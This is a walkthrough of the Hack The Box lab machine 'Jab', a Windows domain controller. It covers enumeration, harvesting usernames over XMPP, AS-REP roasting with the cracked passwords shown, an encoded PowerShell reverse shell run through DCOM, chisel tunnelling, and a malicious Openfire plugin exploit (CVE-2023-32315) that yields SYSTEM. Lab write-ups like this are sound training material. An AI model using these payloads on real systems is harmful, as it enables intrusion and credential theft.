HTB | JAB
Machine - https://app.hackthebox.com/machines/Jab
IP - 10.10.11.4
NMAP
└─$ nmap -sC -sV -p 53,88,135,139,389,445,593,5270,5276,7070,7443,49665,49667,49673,49694,49699,49781 10.10.11.4 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-26 19:56 IST
Nmap scan report for 10.10.11.4
Host is up (0.58s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-26 14:26:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2025-08-26T14:28:25+00:00; +3s from scanner time.
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
5270/tcp open ssl/xmpp Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| xmpp-info:
| STARTTLS Failed
| info:
| capabilities:
| features:
| xmpp:
| compression_methods:
| errors:
| (timeout)
| auth_mechanisms:
|_ unknown:
7070/tcp open http Jetty
|_http-title: Openfire HTTP Binding Service
7443/tcp open ssl/http Jetty
|_http-title: Openfire HTTP Binding Service
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
49781/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-26T14:28:08
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 127.36 secondsPort 53
└─$ dig any @10.10.11.4 jab.htb
; <<>> DiG 9.20.8-6-Debian <<>> any @10.10.11.4 jab.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32277
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;jab.htb. IN ANY
;; ANSWER SECTION:
jab.htb. 600 IN A 10.10.11.4
jab.htb. 3600 IN NS dc01.jab.htb.
jab.htb. 3600 IN SOA dc01.jab.htb. hostmaster.jab.htb. 8239 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.jab.htb. 3600 IN A 10.10.11.4
;; Query time: 423 msec
;; SERVER: 10.10.11.4#53(10.10.11.4) (TCP)
;; WHEN: Tue Aug 26 20:01:25 IST 2025
;; MSG SIZE rcvd: 134
┌──(anurag㉿anurag)-[~/htb/Jab]
└─$ dig axfr @10.10.11.4 jab.htb
; <<>> DiG 9.20.8-6-Debian <<>> axfr @10.10.11.4 jab.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.Port 445
└─$ smbclient -N -L \\\\\\\\10.10.11.4
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableNoting the successful anonymous login, I tried SMB Null session enumeration of usernames via RID cycling, but did not have permissions to make RPC calls.
└─$ netexec smb jab.htb -u "" -p "" --rid-brute
SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.4 445 DC01 [+] jab.htb\\:
SMB 10.10.11.4 445 DC01 [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.Port 88
ldapsearch -H ldap://10.10.11.4 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=jab,DC=htb
namingcontexts: CN=Configuration,DC=jab,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=jab,DC=htb
namingcontexts: DC=DomainDnsZones,DC=jab,DC=htb
namingcontexts: DC=ForestDnsZones,DC=jab,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1not able to enumerate
ldapsearch -H ldap://10.10.11.4 -x -b "DC=jab,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=jab,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CE5, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1I tried to do userenum via Kerbrute but the attack is going for too long (looks like a rabbit hole)
└─$ ./kerbrute userenum --dc 10.10.11.4 -d jab.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 1000 -o kerbrute.txtWe found more than 1800 valid usernames
Let’s try AS-REP Roasting
└─$ grep '@' kerbrute.txt| awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > as_rep_list_kerbrute.txtI tried via impacket-GetNPUser, but since it was taking too much time, I moved on
└─$ impacket-GetNPUsers 'jab.htb/' -usersfile as_rep_list_kerbrute.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.4Port 5270
XMPP is the Extensible Messaging and Presence Protocol, a set of open technologies for instant messaging, presence, multi-party chat, voice and video calls, collaboration, lightweight middleware, content syndication, and generalized routing of XML data.
(reference - https://bishopfox.com/blog/xmpp-underappreciated-attack-surface)
Let’s try to connect via Pidgin
I’ll open Pidgin and it says I have no accounts configured:
I’ll click “Add…” and select XMPP from the “Protocol” drop-down, and fill out the rest:
Le’t accept the certificate
Now it prompt for registration, let’s do that
Now we can select our user and the chat panel pops up
From the menu, “Tools” –> “Room List” will give a series of dialogs that leads to a list of the rooms on this server:
conference.jab.htb is automatically filled in. Clicking “Find Rooms” returns two:
I don’t have access to test room
But we can join test2 room, and it has some messages
The image is just text encoded data
┌──(anurag㉿anurag)-[~/htb/Jab]
└─$ echo "VGhlIGltYWdlIGRhdGEgZ29lcyBoZXJlCg==" | base64 -d
The image data goes hereOn looking around we find Search for Users
and it gives us a search directory
On searching, it spat out everything
But there isn’t a way to export the list
asking ChatGPT to find a way to export it suggests opening a debug window and searching again
Now I can save
Let’s copy the list
└─$ grep -oE '[A-Za-z0-9]{1,}\\@jab.htb' purple-debug.log | grep -v 'anurag@jab.htb' | sort -u > jabber_emails.txtWe can extract username
└─$ cat jabber_emails.txt | cut -d '@' -f 1 > jabber_usernames.txtFotthold/shell
Shell as svc_openfire
ASREP Roast
Now, with this new list, we can perform ASREP Roast and we found three hash
└─$ impacket-GetNPUsers 'jab.htb/' -usersfile jabber_usernames.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.4
└─$ cat hashes.aspreroast
$krb5asrep$23$jmontgomery@JAB.HTB:745e57fb259d72d045af15f70442bc62$dc298d5fad838ededed90e9f10edf0c43db5ba5cf0393723d55690c0766fc50a6b511b72f617fdcc66e57fb5179fcd6623d373abaef4317957a0e7ece0faef8215aab447c30ccea7919be99d95e27e015352ae35fe20b199b8218fbfdfc4ba694aa9e5b84f40f53246685240846cc1bfab3c0f3070e3d02031591234896a8b56243b910b1d3af1ff2ccb8e70c19812052a330e68d06e99f481d8b842013271374c9edb23019968735a8b40d8776efc917ccf2f6464230fb41dda2c41db06ec94c880bd0c3c603a9616ccac55d57f382fd8477cea913947ce20e1cff943c29c4c0df4
$krb5asrep$23$lbradford@JAB.HTB:6837dd5e228d94a222b8075f2d636615$6783ed990b03d29ec3beeb4b5800b31af97014b7230515b72d69dcce3bf98d250da9566a701a246dbe2a70d04bef55bfe68a7b305050c53e61a882195626d0aedbdc2c4e07936fb1ea9843b6aaab49bd58adad4b510bc57da962d23993058805cead5e4b0447abbc2289213c06e327d9aced24bdb784bf7ce646a347ee874d7212a5b083ae3b58d6dddc96ecb8544a051cfda4e214d47714f543b482d7c478104e8006b511f113fb33ab00b250a174b74fa2342c370e7d5351e7faf2e18872b6fbce43fbfc4d3464efe9a9dad06f59fa39d185f6a9270664fcaa7008d34fd2f4590a
$krb5asrep$23$mlowe@JAB.HTB:6ca2295aadfff0a40efe575c243a6085$0d48e79ff36a9454a2c1565c4c4d584495defaf216f03f83c46f7a6b74e7b6593ad78dffcbaa0011b8c1a67dcd7680b14e970e436102f5329b538d166dbb11ca839cb52c17af86ca04322d8e33bad2cd2b8e84b7eb73e7e28bdd8045a5b8aed62e2d8075ee436c33673009701ab8a68a8c1078b2625d5b7c7c3b9019f451a5a3ebe6834ddf71eb64762fa0c1d04b4fc43adfba5bc365004ffd3d27632f5e188520a1910e12ca851c36be006074c642dee529461461b5e0d13023fda0029934272ac54a78ff59221d4ac5aed71f78b412d85c3804deec8eba3d515d15dd717fed17c8Let’s crack em
└─$ hashcat hashes.aspreroast /home/anurag/stuff/rockyou.txt
<--SNIP-->
$krb5asrep$23$jmontgomery@JAB.HTB:745e57fb259d72d045af15f70442bc62$dc298d5fad838ededed90e9f10edf0c43db5ba5cf0393723d55690c0766fc50a6b511b72f617fdcc66e57fb5179fcd6623d373abaef4317957a0e7ece0faef8215aab447c30ccea7919be99d95e27e015352ae35fe20b199b8218fbfdfc4ba694aa9e5b84f40f53246685240846cc1bfab3c0f3070e3d02031591234896a8b56243b910b1d3af1ff2ccb8e70c19812052a330e68d06e99f481d8b842013271374c9edb23019968735a8b40d8776efc917ccf2f6464230fb41dda2c41db06ec94c880bd0c3c603a9616ccac55d57f382fd8477cea913947ce20e1cff943c29c4c0df4:Midnight_121
<--SNIP-->We found JMontgomery’s cred
We can Auth via LDAP and SMB
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.4 -d jab.htb -u jmontgomery -p 'Midnight_121'; echo; done
LDAP 10.10.11.4 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
LDAPS 10.10.11.4 636 DC01 [+] jab.htb\\jmontgomery:Midnight_121
SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.4 445 DC01 [+] jab.htb\\jmontgomery:Midnight_121
WINRM 10.10.11.4 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.4 5985 DC01 [-] jab.htb\\jmontgomery:Midnight_121└─$ netexec smb jab.htb -u "jmontgomery" -p "Midnight_121" --shares
SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.4 445 DC01 [+] jab.htb\\jmontgomery:Midnight_121
SMB 10.10.11.4 445 DC01 [*] Enumerated shares
SMB 10.10.11.4 445 DC01 Share Permissions Remark
SMB 10.10.11.4 445 DC01 ----- ----------- ------
SMB 10.10.11.4 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.4 445 DC01 C$ Default share
SMB 10.10.11.4 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.4 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.4 445 DC01 SYSVOL READ Logon server share Since we do not have anything via SMB, let’s see if we can connect to XMPP via jmontgomery cred
Connecting jmontgomery over XMPP
Let’s connect jmontgomery over XMPP
Now we can see a new Room
Let’s connect to that room
From this chat, we now know the credentials of svc_openfire
We can auth via LDAP and SMB
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.4 -d jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw'; echo; done
LDAP 10.10.11.4 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
LDAPS 10.10.11.4 636 DC01 [+] jab.htb\\svc_openfire:!@#$%^&*(1qazxsw
SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.4 445 DC01 [+] jab.htb\\svc_openfire:!@#$%^&*(1qazxsw
WINRM 10.10.11.4 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:jab.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.4 5985 DC01 [-] jab.htb\\svc_openfire:!@#$%^&*(1qazxswnothing new was there over SMB
└─$ netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw' --shares
SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.4 445 DC01 [+] jab.htb\\svc_openfire:!@#$%^&*(1qazxsw
SMB 10.10.11.4 445 DC01 [*] Enumerated shares
SMB 10.10.11.4 445 DC01 Share Permissions Remark
SMB 10.10.11.4 445 DC01 ----- ----------- ------
SMB 10.10.11.4 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.4 445 DC01 C$ Default share
SMB 10.10.11.4 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.4 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.4 445 DC01 SYSVOL READ Logon server share Bloodhound
└─$ bloodhound-python -u svc_openfire -p '!@#$%^&*(1qazxsw' -d jab.htb -ns 10.10.11.4 -c All --zipOn analysing, we found out that SVC_OPENFIRE@JAB.HTB - > ExecuteDCOM - > DC01.JAB.HTB
ExecuteDCOM
The user SVC_OPENFIRE@JAB.HTB has membership in the Distributed COM Users local group on the computer DC01.JAB.HTB.
This can allow code execution under certain conditions by instantiating a COM object on a remote machine and invoking its methods.
DCOM is built on top of the TCP/IP RPC protocol (TCP ports 135 + high ephemeral ports) and may leverage several different RPC interface UUIDs(outlined here). In order to use DCOM, one must be authenticated. Consequently, logon events and authentication-specific logs(Kerberos, NTLM, etc.) will be generated when using DCOM.
reference - https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model and https://bloodhound.specterops.io/resources/edges/execute-dcom
Let’s try to ping our machine from the box via DCOM MMC20
└─$ impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.16.4'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies └─$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
16:37:25.757965 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 148, length 40
16:37:25.758023 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 148, length 40
16:37:27.004052 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 149, length 40
16:37:27.004075 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 149, length 40
16:37:27.692570 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 150, length 40
16:37:27.692601 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 150, length 40
16:37:28.701264 IP 10.10.11.4 > 10.10.16.4: ICMP echo request, id 1, seq 151, length 40
16:37:28.701296 IP 10.10.16.4 > 10.10.11.4: ICMP echo reply, id 1, seq 151, length 40Now we can try to get revshell
└─$ impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANAAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies └─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.4] 64596
PS C:\\windows\\system32> whoami
jab\\svc_openfire
PS C:\\windows\\system32>
found user.txt
Directory: C:\\Users\\svc_openfire\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/27/2025 5:38 AM 34 user.txt Privilege Escalation
Shell as Administrator
Port forwarding
we can see port 9090 and 9091 being hosted internally
let’s use chisel to do port forwarding
└─$ ./chisel server -p 8000 --reverse
2025/08/27 17:10:57 server: Reverse tunnelling enabled
2025/08/27 17:10:57 server: Fingerprint 6qfipdw2+WXV3ZOS8xqEf2y8vPvQ2oJEc/h01ys52WU=
2025/08/27 17:10:57 server: Listening on <http://0.0.0.0:8000>
2025/08/27 17:12:12 server: session#1: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/27 17:12:12 server: session#1: tun: proxy#R:9090=>9090: Listening
2025/08/27 17:12:12 server: session#1: tun: proxy#R:9091=>9091: ListeningPS C:\\temp> .\\chisel.exe client 10.10.16.4:8000 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091 └─$ nmap -sCV -p9090,9091 localhost
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-27 17:14 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000096s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
9090/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: jive-ibtn jive-btn-gradient
| hadoop-tasktracker-info:
|_ Logs: jive-ibtn jive-btn-gradient
|_http-title: Site doesn't have a title (text/html).
9091/tcp open ssl/http Jetty
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 72.21 secondsOpenfire admin console
We can see there is openfire console at port 9091
We can login via svc_openfire
CVE-2023-32315
I found this GitHub Now I need to upload openfire-management-tool-plugin.jar Then goto tab server > server settings > Management tool and Access web shell with password "123"
Here we can see program home page
Now we have to select system command
and we can execute cmd
and we are nt authority\\system
we get root.txt
we can also get revshell
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.4] 65362
PS C:\\Program Files\\Openfire\\bin> whoami
nt authority\\system
PS C:\\Program Files\\Openfire\\bin>Last updated